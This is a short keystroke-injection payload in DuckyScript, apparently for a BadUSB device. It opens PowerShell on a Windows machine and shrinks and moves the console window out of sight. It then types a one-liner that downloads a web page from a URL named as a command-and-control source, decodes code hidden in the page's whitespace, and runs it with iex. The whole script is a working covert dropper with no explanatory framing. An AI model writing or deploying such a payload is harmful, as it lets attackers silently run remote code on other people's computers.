DELAY 3000
GUI r
DELAY 1000
STRING powershell 
ENTER
DELAY 500
STRING [console]::WindowHeight=5
ENTER
STRING [console]::WindowWidth=5
ENTER
ALT SPACE
STRING m
LEFTARROW
REPEAT 10
STRING [console]::WindowHeight=1
ENTER
STRING [console]::WindowWidth=1
ENTER
STRING $CnC = "https://raw.githubusercontent.com/ephreet/html-ninja/master/macro_poc.htm"; $pch = "nil"; $b = ""; $ch = "";foreach ($cu in (Invoke-WebRequest $CnC -UserAgent "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0").ToString().tocharArray()) {$ch = $cu;if ($pch -eq " "){if ($ch -eq " "){$b = $b + "1"; $ch = "nil"}else{$b = $b + "0";$ch = "nil"}};$pch = $ch}$c = "";($b -split '(\w{8})' | ? {$}) | ForEach-Object {$c = $c + [convert]::Tochar([System.Convert]::ToByte($,2))};iex $c
DELAY 500
ENTER
STRING EXIT
ENTER
